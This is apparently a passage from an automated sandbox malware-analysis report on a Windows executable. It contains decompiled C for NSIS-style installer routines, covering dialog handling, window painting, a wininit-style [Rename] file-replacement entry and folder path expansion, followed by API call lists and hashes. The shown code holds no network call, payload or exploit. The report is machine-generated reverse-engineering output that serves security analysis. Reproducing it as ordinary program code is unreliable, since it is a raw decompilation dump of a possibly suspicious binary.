                                                                                                                          				intOrPtr _t107;
                                                                                                                          				intOrPtr _t109;
                                                                                                                          				int _t110;
                                                                                                                          				signed int* _t112;
                                                                                                                          				signed int _t113;
                                                                                                                          				char* _t114;
                                                                                                                          				CHAR* _t115;
                                                                                                                          
                                                                                                                          				if(_a8 != 0x110) {
                                                                                                                          					if(_a8 != 0x111) {
                                                                                                                          						L11:
                                                                                                                          						if(_a8 != 0x4e) {
                                                                                                                          							if(_a8 == 0x40b) {
                                                                                                                          								 *0x429884 =  *0x429884 + 1;
                                                                                                                          							}
                                                                                                                          							L25:
                                                                                                                          							_t110 = _a16;
                                                                                                                          							L26:
                                                                                                                          							return E00404338(_a8, _a12, _t110);
                                                                                                                          						}
                                                                                                                          						_t52 = GetDlgItem(_a4, 0x3e8);
                                                                                                                          						_t110 = _a16;
                                                                                                                          						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                                                                                                                          							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                                                                                                                          							_t109 =  *((intOrPtr*)(_t110 + 0x18));
                                                                                                                          							_v12 = _t100;
                                                                                                                          							_v16 = _t109;
                                                                                                                          							_v8 = 0x42e3e0;
                                                                                                                          							if(_t100 - _t109 < 0x800) {
                                                                                                                          								SendMessageA(_t52, 0x44b, 0,  &_v16);
                                                                                                                          								SetCursor(LoadCursorA(0, 0x7f02));
                                                                                                                          								_push(1);
                                                                                                                          								_t40 =  &_v8; // 0x42e3e0
                                                                                                                          								E004046E0(_a4,  *_t40);
                                                                                                                          								SetCursor(LoadCursorA(0, 0x7f00));
                                                                                                                          								_t110 = _a16;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                                                                                                                          							goto L26;
                                                                                                                          						} else {
                                                                                                                          							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                                                                                                                          								SendMessageA( *0x42f448, 0x111, 1, 0);
                                                                                                                          							}
                                                                                                                          							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                                                                                                                          								SendMessageA( *0x42f448, 0x10, 0, 0);
                                                                                                                          							}
                                                                                                                          							return 1;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					if(_a12 >> 0x10 != 0 ||  *0x429884 != 0) {
                                                                                                                          						goto L25;
                                                                                                                          					} else {
                                                                                                                          						_t112 =  *0x42a090 + 0x14;
                                                                                                                          						if(( *_t112 & 0x00000020) == 0) {
                                                                                                                          							goto L25;
                                                                                                                          						}
                                                                                                                          						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                                                                                          						E004042F3(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                                                                                          						E004046BC();
                                                                                                                          						goto L11;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				_t98 = _a16;
                                                                                                                          				_t113 =  *(_t98 + 0x30);
                                                                                                                          				if(_t113 < 0) {
                                                                                                                          					_t107 =  *0x42ec1c; // 0x82c3c2
                                                                                                                          					_t113 =  *(_t107 - 4 + _t113 * 4);
                                                                                                                          				}
                                                                                                                          				_push( *((intOrPtr*)(_t98 + 0x34)));
                                                                                                                          				_t114 = _t113 +  *0x42f498;
                                                                                                                          				_push(0x22);
                                                                                                                          				_a16 =  *_t114;
                                                                                                                          				_v12 = _v12 & 0x00000000;
                                                                                                                          				_t115 = _t114 + 1;
                                                                                                                          				_v16 = _t115;
                                                                                                                          				_v8 = E00404407;
                                                                                                                          				E004042D1(_a4);
                                                                                                                          				_push( *((intOrPtr*)(_t98 + 0x38)));
                                                                                                                          				_push(0x23);
                                                                                                                          				E004042D1(_a4);
                                                                                                                          				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                                                                                          				E004042F3( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                                                                                                                          				_t99 = GetDlgItem(_a4, 0x3e8);
                                                                                                                          				E00404306(_t99);
                                                                                                                          				SendMessageA(_t99, 0x45b, 1, 0);
                                                                                                                          				_t86 =  *( *0x42f454 + 0x68);
                                                                                                                          				if(_t86 < 0) {
                                                                                                                          					_t86 = GetSysColor( ~_t86);
                                                                                                                          				}
                                                                                                                          				SendMessageA(_t99, 0x443, 0, _t86);
                                                                                                                          				SendMessageA(_t99, 0x445, 0, 0x4010000);
                                                                                                                          				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                                                                                                                          				 *0x429884 = 0;
                                                                                                                          				SendMessageA(_t99, 0x449, _a16,  &_v16);
                                                                                                                          				 *0x429884 = 0;
                                                                                                                          				return 0;
                                                                                                                          			}



















                                                                                                                          APIs
                                                                                                                          • CheckDlgButton.USER32 ref: 004044C7
                                                                                                                          • GetDlgItem.USER32 ref: 004044DB
                                                                                                                          • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004044F9
                                                                                                                          • GetSysColor.USER32(?), ref: 0040450A
                                                                                                                          • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404519
                                                                                                                          • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404528
                                                                                                                          • lstrlenA.KERNEL32(?), ref: 0040452B
                                                                                                                          • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040453A
                                                                                                                          • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 0040454F
                                                                                                                          • GetDlgItem.USER32 ref: 004045B1
                                                                                                                          • SendMessageA.USER32(00000000), ref: 004045B4
                                                                                                                          • GetDlgItem.USER32 ref: 004045DF
                                                                                                                          • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040461F
                                                                                                                          • LoadCursorA.USER32 ref: 0040462E
                                                                                                                          • SetCursor.USER32(00000000), ref: 00404637
                                                                                                                          • LoadCursorA.USER32 ref: 0040464D
                                                                                                                          • SetCursor.USER32(00000000), ref: 00404650
                                                                                                                          • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040467C
                                                                                                                          • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404690
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                          • String ID: N$B
                                                                                                                          • API String ID: 3103080414-4074832742
                                                                                                                          • Opcode ID: b933b9ecc43e31cfc63bc3248a7489c66971f92386d9d85ac5963e61a52be2be
                                                                                                                          • Instruction ID: c8b3317feb23aa92da8c88ca1c3cf39d399e1714613d550ff25a6b2d3c0ef38e
                                                                                                                          • Opcode Fuzzy Hash: b933b9ecc43e31cfc63bc3248a7489c66971f92386d9d85ac5963e61a52be2be
                                                                                                                          • Instruction Fuzzy Hash: 3761A1B1A40209BFDB109F61CD45F6A3BA9FB84744F00443AFB05BA1D1D7BDA9618F98
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 90%
                                                                                                                          			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                                                                                          				struct tagLOGBRUSH _v16;
                                                                                                                          				struct tagRECT _v32;
                                                                                                                          				struct tagPAINTSTRUCT _v96;
                                                                                                                          				struct HDC__* _t70;
                                                                                                                          				struct HBRUSH__* _t87;
                                                                                                                          				struct HFONT__* _t94;
                                                                                                                          				long _t102;
                                                                                                                          				signed int _t126;
                                                                                                                          				struct HDC__* _t128;
                                                                                                                          				intOrPtr _t130;
                                                                                                                          
                                                                                                                          				if(_a8 == 0xf) {
                                                                                                                          					_t130 =  *0x42f454;
                                                                                                                          					_t70 = BeginPaint(_a4,  &_v96);
                                                                                                                          					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                                                                                          					_a8 = _t70;
                                                                                                                          					GetClientRect(_a4,  &_v32);
                                                                                                                          					_t126 = _v32.bottom;
                                                                                                                          					_v32.bottom = _v32.bottom & 0x00000000;
                                                                                                                          					while(_v32.top < _t126) {
                                                                                                                          						_a12 = _t126 - _v32.top;
                                                                                                                          						asm("cdq");
                                                                                                                          						asm("cdq");
                                                                                                                          						asm("cdq");
                                                                                                                          						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                                                                                          						_t87 = CreateBrushIndirect( &_v16);
                                                                                                                          						_v32.bottom = _v32.bottom + 4;
                                                                                                                          						_a16 = _t87;
                                                                                                                          						FillRect(_a8,  &_v32, _t87);
                                                                                                                          						DeleteObject(_a16);
                                                                                                                          						_v32.top = _v32.top + 4;
                                                                                                                          					}
                                                                                                                          					if( *(_t130 + 0x58) != 0xffffffff) {
                                                                                                                          						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                                                                                                                          						_a16 = _t94;
                                                                                                                          						if(_t94 != 0) {
                                                                                                                          							_t128 = _a8;
                                                                                                                          							_v32.left = 0x10;
                                                                                                                          							_v32.top = 8;
                                                                                                                          							SetBkMode(_t128, 1);
                                                                                                                          							SetTextColor(_t128,  *(_t130 + 0x58));
                                                                                                                          							_a8 = SelectObject(_t128, _a16);
                                                                                                                          							DrawTextA(_t128, "Setup Setup", 0xffffffff,  &_v32, 0x820);
                                                                                                                          							SelectObject(_t128, _a8);
                                                                                                                          							DeleteObject(_a16);
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					EndPaint(_a4,  &_v96);
                                                                                                                          					return 0;
                                                                                                                          				}
                                                                                                                          				_t102 = _a16;
                                                                                                                          				if(_a8 == 0x46) {
                                                                                                                          					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                                                                                          					 *((intOrPtr*)(_t102 + 4)) =  *0x42f448;
                                                                                                                          				}
                                                                                                                          				return DefWindowProcA(_a4, _a8, _a12, _t102);
                                                                                                                          			}













                                                                                                                          0x0040111f
                                                                                                                          0x00401126
                                                                                                                          0x00401130
                                                                                                                          0x00401142
                                                                                                                          0x00401156
                                                                                                                          0x00401160
                                                                                                                          0x00401165
                                                                                                                          0x00401165
                                                                                                                          0x00401110
                                                                                                                          0x0040116e
                                                                                                                          0x00000000
                                                                                                                          0x00401178
                                                                                                                          0x00401010
                                                                                                                          0x00401013
                                                                                                                          0x00401015
                                                                                                                          0x0040101f
                                                                                                                          0x0040101f
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                          • GetClientRect.USER32 ref: 0040105B
                                                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                          • FillRect.USER32 ref: 004010E4
                                                                                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                          • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                          • DrawTextA.USER32(00000000,Setup Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                          • String ID: F$Setup Setup
                                                                                                                          • API String ID: 941294808-1602013819
                                                                                                                          • Opcode ID: cd331e12ae0955bb205525083ccead6a312c2f6528c49d50c92112df1f80047c
                                                                                                                          • Instruction ID: 0ac27d016dd37b64d299d3f81b39716040336c4aee851974846d4d7042c5b915
                                                                                                                          • Opcode Fuzzy Hash: cd331e12ae0955bb205525083ccead6a312c2f6528c49d50c92112df1f80047c
                                                                                                                          • Instruction Fuzzy Hash: CA419C71800249AFCF058FA5DE459AF7FB9FF44314F00802AF991AA1A0C778EA55DFA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00405EBC(void* __ecx) {
                                                                                                                          				void* __ebx;
                                                                                                                          				void* __edi;
                                                                                                                          				void* __esi;
                                                                                                                          				long _t12;
                                                                                                                          				long _t24;
                                                                                                                          				char* _t31;
                                                                                                                          				int _t37;
                                                                                                                          				void* _t38;
                                                                                                                          				intOrPtr* _t39;
                                                                                                                          				long _t42;
                                                                                                                          				CHAR* _t44;
                                                                                                                          				void* _t46;
                                                                                                                          				void* _t48;
                                                                                                                          				void* _t49;
                                                                                                                          				void* _t52;
                                                                                                                          				void* _t53;
                                                                                                                          
                                                                                                                          				_t38 = __ecx;
                                                                                                                          				_t44 =  *(_t52 + 0x14);
                                                                                                                          				 *0x42c648 = 0x4c554e;
                                                                                                                          				if(_t44 == 0) {
                                                                                                                          					L3:
                                                                                                                          					_t12 = GetShortPathNameA( *(_t52 + 0x1c), 0x42ca48, 0x400);
                                                                                                                          					if(_t12 != 0 && _t12 <= 0x400) {
                                                                                                                          						_t37 = wsprintfA(0x42c248, "%s=%s\r\n", 0x42c648, 0x42ca48);
                                                                                                                          						_t53 = _t52 + 0x10;
                                                                                                                          						E004062E0(_t37, 0x400, 0x42ca48, 0x42ca48,  *((intOrPtr*)( *0x42f454 + 0x128)));
                                                                                                                          						_t12 = E00405DE6(0x42ca48, 0xc0000000, 4);
                                                                                                                          						_t48 = _t12;
                                                                                                                          						 *(_t53 + 0x18) = _t48;
                                                                                                                          						if(_t48 != 0xffffffff) {
                                                                                                                          							_t42 = GetFileSize(_t48, 0);
                                                                                                                          							_t6 = _t37 + 0xa; // 0xa
                                                                                                                          							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                                                                                                          							if(_t46 == 0 || E00405E5E(_t48, _t46, _t42) == 0) {
                                                                                                                          								L18:
                                                                                                                          								return CloseHandle(_t48);
                                                                                                                          							} else {
                                                                                                                          								if(E00405D4B(_t38, _t46, "[Rename]\r\n") != 0) {
                                                                                                                          									_t49 = E00405D4B(_t38, _t21 + 0xa, 0x40a3f0);
                                                                                                                          									if(_t49 == 0) {
                                                                                                                          										_t48 =  *(_t53 + 0x18);
                                                                                                                          										L16:
                                                                                                                          										_t24 = _t42;
                                                                                                                          										L17:
                                                                                                                          										E00405DA1(_t24 + _t46, 0x42c248, _t37);
                                                                                                                          										SetFilePointer(_t48, 0, 0, 0);
                                                                                                                          										E00405E8D(_t48, _t46, _t42 + _t37);
                                                                                                                          										GlobalFree(_t46);
                                                                                                                          										goto L18;
                                                                                                                          									}
                                                                                                                          									_t39 = _t46 + _t42;
                                                                                                                          									_t31 = _t39 + _t37;
                                                                                                                          									while(_t39 > _t49) {
                                                                                                                          										 *_t31 =  *_t39;
                                                                                                                          										_t31 = _t31 - 1;
                                                                                                                          										_t39 = _t39 - 1;
                                                                                                                          									}
                                                                                                                          									_t24 = _t49 - _t46 + 1;
                                                                                                                          									_t48 =  *(_t53 + 0x18);
                                                                                                                          									goto L17;
                                                                                                                          								}
                                                                                                                          								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                                                                                          								_t42 = _t42 + 0xa;
                                                                                                                          								goto L16;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          				} else {
                                                                                                                          					CloseHandle(E00405DE6(_t44, 0, 1));
                                                                                                                          					_t12 = GetShortPathNameA(_t44, 0x42c648, 0x400);
                                                                                                                          					if(_t12 != 0 && _t12 <= 0x400) {
                                                                                                                          						goto L3;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				return _t12;
                                                                                                                          			}




















                                                                                                                          APIs
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,0040604D,?,?), ref: 00405EED
                                                                                                                          • GetShortPathNameA.KERNEL32 ref: 00405EF6
                                                                                                                            • Part of subcall function 00405D4B: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5B
                                                                                                                            • Part of subcall function 00405D4B: lstrlenA.KERNEL32(00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D8D
                                                                                                                          • GetShortPathNameA.KERNEL32 ref: 00405F13
                                                                                                                          • wsprintfA.USER32 ref: 00405F31
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,0042CA48,C0000000,00000004,0042CA48,?,?,?,?,?), ref: 00405F6C
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F7B
                                                                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB3
                                                                                                                          • SetFilePointer.KERNEL32(0040A3F0,00000000,00000000,00000000,00000000,0042C248,00000000,-0000000A,0040A3F0,00000000,[Rename],00000000,00000000,00000000), ref: 00406009
                                                                                                                          • GlobalFree.KERNEL32 ref: 0040601A
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406021
                                                                                                                            • Part of subcall function 00405DE6: GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\user\Desktop\lpdKSOB78u.exe,80000000,00000003), ref: 00405DEA
                                                                                                                            • Part of subcall function 00405DE6: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                          • String ID: %s=%s$[Rename]
                                                                                                                          • API String ID: 2171350718-1727408572
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 72%
                                                                                                                          			E004062E0(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                                                                                                          				struct _ITEMIDLIST* _v8;
                                                                                                                          				char _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				signed char _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				signed char _v28;
                                                                                                                          				signed int _t38;
                                                                                                                          				CHAR* _t39;
                                                                                                                          				signed int _t41;
                                                                                                                          				char _t52;
                                                                                                                          				char _t53;
                                                                                                                          				char _t55;
                                                                                                                          				char _t57;
                                                                                                                          				void* _t65;
                                                                                                                          				char* _t66;
                                                                                                                          				signed int _t80;
                                                                                                                          				intOrPtr _t86;
                                                                                                                          				char _t88;
                                                                                                                          				void* _t89;
                                                                                                                          				CHAR* _t90;
                                                                                                                          				void* _t92;
                                                                                                                          				signed int _t97;
                                                                                                                          				signed int _t99;
                                                                                                                          				void* _t100;
                                                                                                                          
                                                                                                                          				_t92 = __esi;
                                                                                                                          				_t89 = __edi;
                                                                                                                          				_t65 = __ebx;
                                                                                                                          				_t38 = _a8;
                                                                                                                          				if(_t38 < 0) {
                                                                                                                          					_t86 =  *0x42ec1c; // 0x82c3c2
                                                                                                                          					_t38 =  *(_t86 - 4 + _t38 * 4);
                                                                                                                          				}
                                                                                                                          				_push(_t65);
                                                                                                                          				_push(_t92);
                                                                                                                          				_push(_t89);
                                                                                                                          				_t66 = _t38 +  *0x42f498;
                                                                                                                          				_t39 = 0x42e3e0;
                                                                                                                          				_t90 = 0x42e3e0;
                                                                                                                          				if(_a4 >= 0x42e3e0 && _a4 - 0x42e3e0 < 0x800) {
                                                                                                                          					_t90 = _a4;
                                                                                                                          					_a4 = _a4 & 0x00000000;
                                                                                                                          				}
                                                                                                                          				while(1) {
                                                                                                                          					_t88 =  *_t66;
                                                                                                                          					if(_t88 == 0) {
                                                                                                                          						break;
                                                                                                                          					}
                                                                                                                          					__eflags = _t90 - _t39 - 0x400;
                                                                                                                          					if(_t90 - _t39 >= 0x400) {
                                                                                                                          						break;
                                                                                                                          					}
                                                                                                                          					_t66 = _t66 + 1;
                                                                                                                          					__eflags = _t88 - 4;
                                                                                                                          					_a8 = _t66;
                                                                                                                          					if(__eflags >= 0) {
                                                                                                                          						if(__eflags != 0) {
                                                                                                                          							 *_t90 = _t88;
                                                                                                                          							_t90 =  &(_t90[1]);
                                                                                                                          							__eflags = _t90;
                                                                                                                          						} else {
                                                                                                                          							 *_t90 =  *_t66;
                                                                                                                          							_t90 =  &(_t90[1]);
                                                                                                                          							_t66 = _t66 + 1;
                                                                                                                          						}
                                                                                                                          						continue;
                                                                                                                          					}
                                                                                                                          					_t41 =  *((char*)(_t66 + 1));
                                                                                                                          					_t80 =  *_t66;
                                                                                                                          					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f;
                                                                                                                          					_v24 = _t80;
                                                                                                                          					_v28 = _t80 | 0x00000080;
                                                                                                                          					_v16 = _t41;
                                                                                                                          					_v20 = _t41 | 0x00000080;
                                                                                                                          					_t66 = _a8 + 2;
                                                                                                                          					__eflags = _t88 - 2;
                                                                                                                          					if(_t88 != 2) {
                                                                                                                          						__eflags = _t88 - 3;
                                                                                                                          						if(_t88 != 3) {
                                                                                                                          							__eflags = _t88 - 1;
                                                                                                                          							if(_t88 == 1) {
                                                                                                                          								__eflags = (_t41 | 0xffffffff) - _t97;
                                                                                                                          								E004062E0(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
                                                                                                                          							}
                                                                                                                          							L42:
                                                                                                                          							_t90 =  &(_t90[lstrlenA(_t90)]);
                                                                                                                          							_t39 = 0x42e3e0;
                                                                                                                          							continue;
                                                                                                                          						}
                                                                                                                          						__eflags = _t97 - 0x1d;
                                                                                                                          						if(_t97 != 0x1d) {
                                                                                                                          							__eflags = (_t97 << 0xa) + 0x430000;
                                                                                                                          							E0040624D(_t90, (_t97 << 0xa) + 0x430000);
                                                                                                                          						} else {
                                                                                                                          							E004061AB(_t90,  *0x42f448);
                                                                                                                          						}
                                                                                                                          						__eflags = _t97 + 0xffffffeb - 7;
                                                                                                                          						if(_t97 + 0xffffffeb < 7) {
                                                                                                                          							L33:
                                                                                                                          							E00406528(_t90);
                                                                                                                          						}
                                                                                                                          						goto L42;
                                                                                                                          					}
                                                                                                                          					_t52 =  *0x42f44c;
                                                                                                                          					__eflags = _t52;
                                                                                                                          					_t99 = 2;
                                                                                                                          					if(_t52 >= 0) {
                                                                                                                          						L13:
                                                                                                                          						_a8 = 1;
                                                                                                                          						L14:
                                                                                                                          						__eflags =  *0x42f4e4;
                                                                                                                          						if( *0x42f4e4 != 0) {
                                                                                                                          							_t99 = 4;
                                                                                                                          						}
                                                                                                                          						__eflags = _t80;
                                                                                                                          						if(__eflags >= 0) {
                                                                                                                          							__eflags = _t80 - 0x25;
                                                                                                                          							if(_t80 != 0x25) {
                                                                                                                          								__eflags = _t80 - 0x24;
                                                                                                                          								if(_t80 == 0x24) {
                                                                                                                          									GetWindowsDirectoryA(_t90, 0x400);
                                                                                                                          									_t99 = 0;
                                                                                                                          								}
                                                                                                                          								while(1) {
                                                                                                                          									__eflags = _t99;
                                                                                                                          									if(_t99 == 0) {
                                                                                                                          										goto L30;
                                                                                                                          									}
                                                                                                                          									_t53 =  *0x42f444;
                                                                                                                          									_t99 = _t99 - 1;
                                                                                                                          									__eflags = _t53;
                                                                                                                          									if(_t53 == 0) {
                                                                                                                          										L26:
                                                                                                                          										_t55 = SHGetSpecialFolderLocation( *0x42f448,  *(_t100 + _t99 * 4 - 0x18),  &_v8);
                                                                                                                          										__eflags = _t55;
                                                                                                                          										if(_t55 != 0) {
                                                                                                                          											L28:
                                                                                                                          											 *_t90 =  *_t90 & 0x00000000;
                                                                                                                          											__eflags =  *_t90;
                                                                                                                          											continue;
                                                                                                                          										}
                                                                                                                          										__imp__SHGetPathFromIDListA(_v8, _t90);
                                                                                                                          										_v12 = _t55;
                                                                                                                          										__imp__CoTaskMemFree(_v8);
                                                                                                                          										__eflags = _v12;
                                                                                                                          										if(_v12 != 0) {
                                                                                                                          											goto L30;
                                                                                                                          										}
                                                                                                                          										goto L28;
                                                                                                                          									}
                                                                                                                          									__eflags = _a8;
                                                                                                                          									if(_a8 == 0) {
                                                                                                                          										goto L26;
                                                                                                                          									}
                                                                                                                          									_t57 =  *_t53( *0x42f448,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90);
                                                                                                                          									__eflags = _t57;
                                                                                                                          									if(_t57 == 0) {
                                                                                                                          										goto L30;
                                                                                                                          									}
                                                                                                                          									goto L26;
                                                                                                                          								}
                                                                                                                          								goto L30;
                                                                                                                          							}
                                                                                                                          							GetSystemDirectoryA(_t90, 0x400);
                                                                                                                          							goto L30;
                                                                                                                          						} else {
                                                                                                                          							E00406134((_t80 & 0x0000003f) +  *0x42f498, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x42f498, _t90, _t80 & 0x00000040);
                                                                                                                          							__eflags =  *_t90;
                                                                                                                          							if( *_t90 != 0) {
                                                                                                                          								L31:
                                                                                                                          								__eflags = _v16 - 0x1a;
                                                                                                                          								if(_v16 == 0x1a) {
                                                                                                                          									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
                                                                                                                          								}
                                                                                                                          								goto L33;
                                                                                                                          							}
                                                                                                                          							E004062E0(_t66, _t90, _t99, _t90, _v16);
                                                                                                                          							L30:
                                                                                                                          							__eflags =  *_t90;
                                                                                                                          							if( *_t90 == 0) {
                                                                                                                          								goto L33;
                                                                                                                          							}
                                                                                                                          							goto L31;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					__eflags = _t52 - 0x5a04;
                                                                                                                          					if(_t52 == 0x5a04) {
                                                                                                                          						goto L13;
                                                                                                                          					}
                                                                                                                          					__eflags = _v16 - 0x23;
                                                                                                                          					if(_v16 == 0x23) {
                                                                                                                          						goto L13;
                                                                                                                          					}
                                                                                                                          					__eflags = _v16 - 0x2e;
                                                                                                                          					if(_v16 == 0x2e) {
                                                                                                                          						goto L13;
                                                                                                                          					} else {
                                                                                                                          						_a8 = _a8 & 0x00000000;
                                                                                                                          						goto L14;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				 *_t90 =  *_t90 & 0x00000000;
                                                                                                                          				if(_a4 == 0) {
                                                                                                                          					return _t39;
                                                                                                                          				}
                                                                                                                          				return E0040624D(_a4, _t39);
                                                                                                                          			}




























                                                                                                                          APIs
                                                                                                                          • GetSystemDirectoryA.KERNEL32 ref: 0040640B
                                                                                                                          • GetWindowsDirectoryA.KERNEL32(Call,00000400,?,0042A098,00000000,004053AC,0042A098,00000000), ref: 0040641E
                                                                                                                          • SHGetSpecialFolderLocation.SHELL32(004053AC,00000000,?,0042A098,00000000,004053AC,0042A098,00000000), ref: 0040645A
                                                                                                                          • SHGetPathFromIDListA.SHELL32(00000000,Call), ref: 00406468
                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00406474
                                                                                                                          • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406498
                                                                                                                          • lstrlenA.KERNEL32(Call,?,0042A098,00000000,004053AC,0042A098,00000000,00000000,00000000,00000000), ref: 004064EA
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp
